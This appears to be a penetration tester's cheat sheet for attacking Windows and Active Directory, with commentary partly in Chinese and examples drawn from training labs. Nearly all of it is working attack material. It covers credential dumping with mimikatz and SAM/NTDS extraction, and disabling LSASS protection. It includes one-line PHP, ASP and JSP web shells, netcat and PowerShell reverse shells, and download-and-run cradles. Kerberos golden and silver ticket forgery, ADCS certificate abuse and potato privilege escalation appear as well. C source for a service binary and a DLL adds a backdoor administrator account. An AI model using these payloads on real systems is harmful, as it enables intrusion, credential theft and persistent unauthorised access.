python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p NewIntelligenceCorpUser9876 --action add -r webbufferfly.intelligence.htb -d 10.10.*.* 10.10.10.248

MSSQL

1 2	python mssqlclient.py PublicUser:GuestUserCantWrite1@10.10.11.202 exec master.dbo.xp_dirtree '\\10.10..\BFL'

<?php
	// [2] include(/header.inc): failed to open stream: No such file or directory On line 36 in file C:\inetpub\wwwroot\functions.php
	// Following function securely includes a file. Whenever we 
	// will encounter a PHP tag we will just bail out here. 
	function secure_include($file) { 
		if (strpos(file_get_contents($file),'<?') === false) { 
			include($file);		  //<<<<< Error encountered in this line.
		} else { 
			http_response_code(403); 
			die('Forbidden - Tampering attempt detected.'); 
		} 
	} 
?>

1	curl http://10.10.10.231/licenses/licenses.php?theme=//10.10..&h=b1a3d9ecf02d4854f3a730f8b2a9af5d

desktop.ini

https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

1 2	[.ShellClassInfo] IconResource=\\10.10..\BFL

爆破NTLMv2

1	hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

Windows Credential Manager

Web Credential

https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-WebCredentials.ps1

vaultcmd /list
vaultcmd /listproperties:"Web Credentials"
vaultcmd /listcreds:"Web Credentials"
. .\Get-WebCredentials.ps1
Get-WebCredentials

Windows Credential

1 2	cmdkey /list runas /savecred /user:$user cmd.exe

mimikatz

1	sekurlsa::credman

LAPS

1
2
3

dir "c:\program files\laps\admpwd.dll"
find-admpwdextendedrights -identity *
get-admpwdpassword -computername *

SAM

SAM c:\windows\system32\config\system
SYSTEM c:\windows\system32\config\sam
Meterpreter
- hashdump
Volume Shadow Copy

# 卷影拷贝时，拷贝操作需要在cmd中进行而不是powershell
wmic shadowcopy call create volume="c:\"
vssadmin list shadows
copy \\?\globalroot\device\harddiskvolumeshadowcopy1\windows\system32\config\sam .\sam
copy \\?\globalroot\device\harddiskvolumeshadowcopy1\windows\system32\config\system .\system

Registry

1
2
3

reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security

python secretsdump.py local -system /tmp/SYSTEM -sam /tmp/SAM

NTDS.DIT

1 2	mkdir ntds ntdsutil "ac i ntds" "ifm" "create full .\ntds" q q

LSASS

Memory Dump
- taskmgr
- mimikatz

1	sekurlsa::logonpasswords

Protected LSASS
- reg

1 2	reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /f RunAsPPL reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f

mimikatz
(mimidrv.sys)

1
2
3

!+
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

GetShell / Lateral movement

考虑与Pass The Hash或Pass The Ticket结合
psexec
- ADMIN$路径写权限
- impacket-psexec $domain/$username:$password@$ip
evil-winrm
- evil-winrm -i $ip -u $username -p $password
ssh
mssql

1
2
3

python mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
enable_xp_cmdshell
xp_cmdshell whoami

mssql links

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select srvname, srvproduct, rpcout from master..sysservers"

srvname | srvproduct | rpcout | 
--------------------------------
SQL-2 | SQL Server | True | 
SQL-1.CYBERBOTIC.IO | SQL Server | True |

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select * from openquery(\"sql-1.cyberbotic.io\", 'select @@servername')"

column0 | 
----------
SQL-1 |

wmiexec
- impacket-wmiexec $domain/$username:$password@$ip
dcomexec
- impacket-dcomexec -object MMC20 $domain/$username:$password@$ip
WebShell
- PHP: <?php @eval($_POST["BFL"]);?>
- PHP_Reverse_Shell: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- PHP_Reverse_Shell_Generic: https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php
- ASP: <%eval request("BFL")%>
- ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["BFL"],"unsafe");%>
- JSP: <%Runtime.getRuntime().exec(request.getParameter("BFL"));%>
PowerShellTCP
- https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
- Invoke-PowerShellTcp -Reverse -IPAddress 192.168.0.2 -Port 9999
service
- runas用于生成带有目标用户令牌的Shell

runas /netonly /user:$domain\$username "nc64.exe -e cmd.exe $hostname $port"
$password
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=$port -f exe-service -o bfl.exe
smbclient -c "put bfl.exe" -U $username -W $domain "//$ip/admin$/" $password
sc \\$ip create bflservice binpath="c:\windows\bfl.exe"
sc \\$ip start bflservice

schtasks
- runas用于生成带有目标用户令牌的Shell

runas /netonly /user:$domain\$username "nc64.exe -e cmd.exe $ip $port"
$password
schtask /s $ip /ru "system" /create /tn "bfltask" /tr "nc.exe -e cmd.exe $ip $port" /sc once /sd 01/01/1970 /st 00:00
schtasks /s $ip /run /tn "bfltask"
schtsaks /s $ip /run /tn "bfltask"

1	CreateObject("WScript.Shell").Run "nc64.exe -e cmd.exe $ip $port", 0, True

RDP Hijacking

When an administrator uses Remote Desktop to connect to a machine and closes the RDP client instead of logging off, his session will remain open on the server indefinitely. If you have SYSTEM privileges on Windows Server 2016 and earlier, you can take over any existing RDP session without requiring a password.
Windows Server 2019 won’t allow you to connect to another user’s session without knowing its password.

1 2	psexec64.exe -s cmd.exe query user

1
2
3

 USERNAME			SESSIONNAME	   ID  STATE   IDLE TIME  LOGON TIME
>administrator	 rdp-tcp#6		 2  Active		.  4/1/2022 4:09 AM
 luke									3  Disc		   .  4/6/2022 6:51 AM

1	tscon 3 /dest:rdp-tcp#6

Domain Trusts

Parent/Child

SID-History Injection

使用子域管理权限来获取父域管理权限(WITHIN_FOREST & Bidirectional)

用户名需要使用子域中的，sid为子域sid，sids用父域域管理员或父域域管理员组的都行，票据在父域的权限来自于sids

.\Rubeus.exe golden /user:nlamb /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /sids:S-1-5-21-2594061375-675613155-814674916-500

Inbound

域外成员组

get-domaintrust
get-domain -domain dev-studio.com
get-domainforeigngroupmember -domain dev-studio.com
get-domaingroupmember -identity "studio admins"

1
2
3

.\Rubeus.exe asktgt /domain:dev.cyberbotic.io /user:nlamb /aes256:a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4
.\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:$ticket
.\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:$ticket

Outbound

Inbound域中存在Outbound域的信任账户

get-domaintrust
get-domainObject | where-object { $_.cn -eq 'msp.org' }
.\Mimikatz lsadump::dcsync /domain:cyberbotic.io /guid:{b93d2e36-48df-46bf-89d5-2fc22c139b43}
.\Rubeus.exe asktgt /domain:msp.org /user:CYBER$ /rc4:fe4dea093e0a56af8a6667ba69f27c28

Tickets

$sid为域sid

Golden Tickets

1	kerberos::golden /sid:$sid /domain:$domain /user:$username /krbtgt:$krbtgt_ntlm /ptt

Silver Tickets

1	kerberos::golden /sid:$sid /domain:$domain /target:$hostname /service:$service /rc4:$ntlm /user:$username /ptt

Unconstrained Delegation

TRUSTED_FOR_DELEGATION

In the background, if a user with the “TRUSTED_FOR_DELEGATION” flag set authenticates to a host with Unconstrained Delegation configured, a ticket-granting ticket (TGT) for that user account is generated and stored in memory so it can be used later if needed.

get-netcomputer -unconstrained
rubeus klist
rubeus dump /luid:0x14b3e9 /nowarp
rubeus createnetonly /program:c:\windows\system32\cmd.exe /domain:dev.cyberbotic.io /username:nlamb /password:fake /ticket:$ticket

Rubeus & Sharpspooltrigger

1 2	.\Rubeus.exe monitor /interval:10 /nowarp .\Sharpspooltrigger.exe dc-2.cyberbotic.io web.cyberbotic.io

Constrained Delegation

curl https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -O
. .\PowerView.ps1
get-netuser -trustedtoauth
get-netcomputer -trustedtoauth

1	.\Rubeus.exe s4u /impersonate:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /nowarp /ticket:$ticket

msds-allowedtodelegateto

mimikatz

1
2
3

privilege::debug
token::elevate
lsadump::secrets

kekeo

1 2	tgt::ask /user:$user /domain:$domain /password:$password tgs::s4u /tgt:$tgt_file /user:$user /service:$service/$hostname

mimikatz

1 2	privilege::debug kerberos::ptt $tgs_file

http + wsman -> powershell remoting

1 2	New-PSSession -ComputerName $hostname Enter-PSSession -ComputerName $hostname

Alternate Service Name

系统环境中的运行的服务使用相同的密钥，所以可以进行替换

HOST
RPCSS
HTTP
WSMAN
WINRM
CIFS
LDAP

1	.\Rubeus.exe tgssub /altservice:cifs /ticket:$ticket

Print Spooler Service MITM

一台机器对另一台机器有管理员权限

1 2	gwmi win32_printer -computer $admin_ip get-printerport -computername $admin_ip

1	nmap --script=smb2-security-mode $admin_ip $target_ip

1 2	python ntlmrelayx.py -smb2support -t smb://$target_ip -debug python ntlmrelayx.py -smb2support -t smb://$target_ip -debug -c "whoami /all"

1	spoolsample.exe $admin_ip $mitm_ip

https://github.com/leechristensen/SpoolSample

注册表

1 2	reg query hklm /f password /t reg_sz /s reg query hkcu /f password /t reg_sz /s

路径

powershell history: "c:\users\$user\appdata\roaming\microsoft\windows\powershell\psreadline\ConsoleHost_history.txt"
redif conf: "c:\program files\redis\redis.windows.conf"
mssql conf: "c:\program files\microsoft sql server\"
mRemoteNG: c:\users\$user\appdata\roaming\mremoteng\confcons.xml
WEB & SMB & FTP
firefox: c:\users\$user\appdata\roaming\mozilla
- https://raw.githubusercontent.com/unode/firefox_decrypt/master/firefox_decrypt.py
MCAFEE: c:\programdata\mcafee\agent\db\ma.db
APPLocker: c:\windows\system32\spool\drivers\color\

文件传输

Server

1	python smbserver.py Bufferfly . -smb2support -username Buffer -password fly &

http

1	python -m http.server 80 &

client
- curl
- wget
- iex(new-object net.webclient).downloadstring("http://10.10.*.*/PowerView.ps1")
- $WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://10.4.23.166/JuicyPotato.exe", "C:\users\bruce\desktop\juicy.exe")
- iwr -uri http://192.168.45.187/winPEASany.exe -outfile winPEASany.exe
- certutil -urlcache -split -f http://10.50.98.5:8888/bfl.exe
- smb
  1
  2
  3
  net use \\10.10.*.*\Bufferfly /u:Buffer fly
  copy test \\10.10.*.*
  net use /d \\10.10.*.*\Bufferfly

端口转发

lcx
- https://github.com/windworst/LCX
- https://github.com/AA8j/SecTools/raw/main/lcx/lcx.exe
chisel
- https://github.com/jpillora/chisel
earthworm
- http://rootkiter.com/EarthWorm/
sshuttle
- https://github.com/sshuttle/sshuttle
netsh

1
2

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=0.0.0.0 connectport=22 connectaddress=10.4.204.215
netsh advfirewall firewall add rule name="port_forward_2222" protocol=TCP dir=in localip=0.0.0.0 localport=2222 action=allow

权限提升

S4U2Self Abuse

一般用于机器账户的TGT获取任意用户的ST，且服务仅为该机器上的服务

1	.\Rubeus.exe s4u /impersonate:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /nowarp /ticket:$ticket

Pass The Ticket

1 2	.\Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:fake .\Rubeus.exe ptt /luid:0x14b3e9 /ticket:$ticket

Token Impersonation

Cobalt Strike

1 2	steal_token PID rev2self

EXP

runascs

https://github.com/antonioCoco/RunasCs/

1	runascs c.bum Tikkycoll_431012284 powershell -r 10.10..:9998

Overpass The Hash

1	sekurlsa::pth /domain:$domain /user:$username /ntlm:$ntlm /run:powershell

1	.\Rubeus.exe asktgt /user:jking /aes256:$AES_HASH /domain:dev.cyberbotic.io /opsec /nowarp

MSSQL Impersonate

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select * from sys.server_permissions where permission_name='IMPERSONATE'"

class | class_desc | major_id | minor_id | grantee_principal_id | grantor_principal_id | type | permission_name | state | state_desc | 
---------------------------------------------------------------------------------------------------------------------------------------
101 | SERVER_PRINCIPAL | 267 | 0 | 268 | 267 | IM   | IMPERSONATE | G | GRANT |

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select * from sys.server_principals where principal_id=267 or principal_id=268"

name | principal_id | sid | type | type_desc | is_disabled | create_date | modify_date | default_database_name | default_language_name | credential_id | owning_principal_id | is_fixed_role | 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
DEV\mssql_svc | 267 | System.Byte[] | U | WINDOWS_LOGIN | False | 1/20/2023 4:30:36 PM | 1/20/2023 4:30:36 PM | master | us_english |  |  | False | 
DEV\Domain Users | 268 | System.Byte[] | G | WINDOWS_GROUP | False | 1/20/2023 4:32:54 PM | 1/20/2023 4:32:54 PM | master | us_english |  |  | False |

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select system_user, is_srvrolemember('sysadmin');"

column0 | column1 | 
--------------------
DEV\bfarmer | 0 |

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"execute as login = 'dev\mssql_svc'; select system_user, is_srvrolemember('sysadmin');"

column0 | column1 | 
--------------------
DEV\mssql_svc | 1 |

1	.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"exec('xp_cmdshell ''powershell -w hidden -enc $payload''') at [sql-1.cyberbotic.io]"

PrintNightmare

https://github.com/calebstewart/CVE-2021-1675
https://github.com/m8sec/CVE-2021-34527

alwaysinstallelevated

找到alwaysinstallelevated，即当注册表中的alwaysinstallelevated设置为1时，机器上运行任何的msi程序，均会以system权限执行，我们只需生成一个msi的木马程序即可提权。
https://zhuanlan.zhihu.com/p/375373404

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
	AlwaysInstallElevated   REG_DWORD   0x1

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
	AlwaysInstallElevated   REG_DWORD   0x1

SeImpersonatePrivilege/SeCreateGlobalPrivilege

https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

针对新版本Windows系统
https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip

仅用于SeImpersonatePrivilege, 不触发Windows Defender
https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name	  Description						   State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking				  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects				   Enabled

如果开启SeImpersonate权限，juicypotato的参数可以使用-t t
如果开启SeAssignPrimaryToken权限，juicypotato的参数可以使用-t u
-t * 为两个均尝试
如果均未开启，那么无法提权

https://blog.csdn.net/god_zzZ/article/details/106334702

1	JuicyPotato.exe -t t -p "./nc.exe" -a "-e c:\windows\system32\cmd.exe 10.10.. 9995" -l 6666 -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

1	JuicyPotatoNG.exe -t t -p "./nc.exe" -a "-e c:\windows\system32\cmd.exe 10.10.. 9995"

CLSID

https://github.com/ohpe/juicy-potato/tree/master/CLSID

Meterpreter

1
2
3

load incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"

ps | grep services.exe
Filtering on 'services.exe'

Process List
============

 PID  PPID  Name		  Arch  Session  User			   Path
 ---  ----  ----		  ----  -------  ----			   ----
 668  580   services.exe  x64   0	  NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe
migrate 668

ADCS

This is a quick lab to familiarize with ECS1 privilege escalation technique, that illustrates how it’s possible to elevate from a regular user to domain administrator in a Windows Domain by abusing over-permissioned Active Directory Certificate Services (ADCS) certificate templates.
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin

msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT # 任意证书申请对象
PkiExtendedKeyUsage: Client Authentication # 证书可用于AD
Enrollment Rights: Domain Users # 证书申请者为域用户

查询是否存在错误配置的证书模板

1	.\Certify.exe find /vulnerable

CA Name                               : dc-2.dev.cyberbotic.io\sub-ca
Template Name                         : CustomUser
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
Permissions
  Enrollment Permissions
    Enrollment Rights           : CYBER\Domain Admins           S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Domain Users            S-1-5-21-2594061375-675613155-814674916-513
                                  CYBER\Enterprise Admins       S-1-5-21-2594061375-675613155-814674916-519
                                  DEV\Domain Users              S-1-5-21-569305411-121244042-2357301523-513
  Object Control Permissions
    Owner                       : CYBER\Administrator           S-1-5-21-2594061375-675613155-814674916-500
    WriteOwner Principals       : CYBER\Administrator           S-1-5-21-2594061375-675613155-814674916-500
                                  CYBER\Domain Admins           S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Enterprise Admins       S-1-5-21-2594061375-675613155-814674916-519
    WriteDacl Principals        : CYBER\Administrator           S-1-5-21-2594061375-675613155-814674916-500
                                  CYBER\Domain Admins           S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Enterprise Admins       S-1-5-21-2594061375-675613155-814674916-519
    WriteProperty Principals    : CYBER\Administrator           S-1-5-21-2594061375-675613155-814674916-500
                                  CYBER\Domain Admins           S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Enterprise Admins       S-1-5-21-2594061375-675613155-814674916-519

为域管理员nlamb申请证书

1	.\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /templace:CustomUser /altname:nlamb

私钥以及证书内容保存为cert.pem

转为pfx格式

1
2
3

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: 123
Verifying - Enter Export Password: 123

获取Base64编码结果

1	cat cert.pfx \| base64 -w 0

使用证书获取域管tgt

1	.\Rubeus.exe asktgt /user:nlamb /password:123 /certificate:$certificate

其他工具

pip install certipy-ad
certipy find -vulnerable -stdout -u ryan.cooper@sequel.htb -p NuclearMosquito3 -dc-ip 10.10.11.202
certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -target dc.sequel.htb -template UserAuthentication -ca sequel-DC-CA -upn administrator@sequel.htb
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202

dcsync

“With both GetChanges and GetChangesAll privileges in BloodHound, you may perform a dcsync attack to get the password hash of an arbitrary principal using mimikatz”
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#getchanges-getchangesall
mimikatz
有一个dcsync功能, 可以利用卷影拷贝服务直接读取ntds.dll文件并检索域散列值。
《内网安全攻防》 P.296

1	python secretsdump.py -dc-ip 10.10.10.30 megacorp.local/svc_bes:Sheffield19@10.10.10.30

服务

服务程序

1	Get-CimInstance -ClassName win32_service \| Select Name,State,PathName \| Where-Object {$_.State -like 'Running'}

#include <stdlib.h>

int main ()
{
	int i;

	i = system ("net user bfl bfl123456. /add");
	i = system ("net localgroup administrators bfl /add");
	return 0;
}

1	x86_64-w64-mingw32-gcc bfl.c -o bfl.exe

1	Restart-Service ServiceName

DLL劫持

https://learn.microsoft.com/en-us/sysinternals/downloads/procmon

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
	switch ( ul_reason_for_call )
	{
		case DLL_PROCESS_ATTACH: // A process is loading the DLL.
		int i;
		i = system ("net user bfl bfl123456. /add");
		i = system ("net localgroup administrators bfl /add");
		break;
		case DLL_THREAD_ATTACH: // A process is creating a new thread.
		break;
		case DLL_THREAD_DETACH: // A thread exits normally.
		break;
		case DLL_PROCESS_DETACH: // A process unloads the DLL.
		break;
	}
	return TRUE;
}

1	x86_64-w64-mingw32-gcc bfl.cpp --shared -o bfl.dll

1	Restart-Service ServiceName

Unquoted Service Paths

1	C:\Program Files\Buffer Fly\Bufferfly.exe

1
2
3

C:\Program.exe
C:\Program Files\Buffer.exe
C:\Program Files\Buffer Fly\Bufferfly.exe

1	Get-CimInstance -ClassName win32_service \| Select Name,State,PathName \| Where-Object {$_.State -like 'Running'}

计划任务

1	schtasks /query /fo LIST /v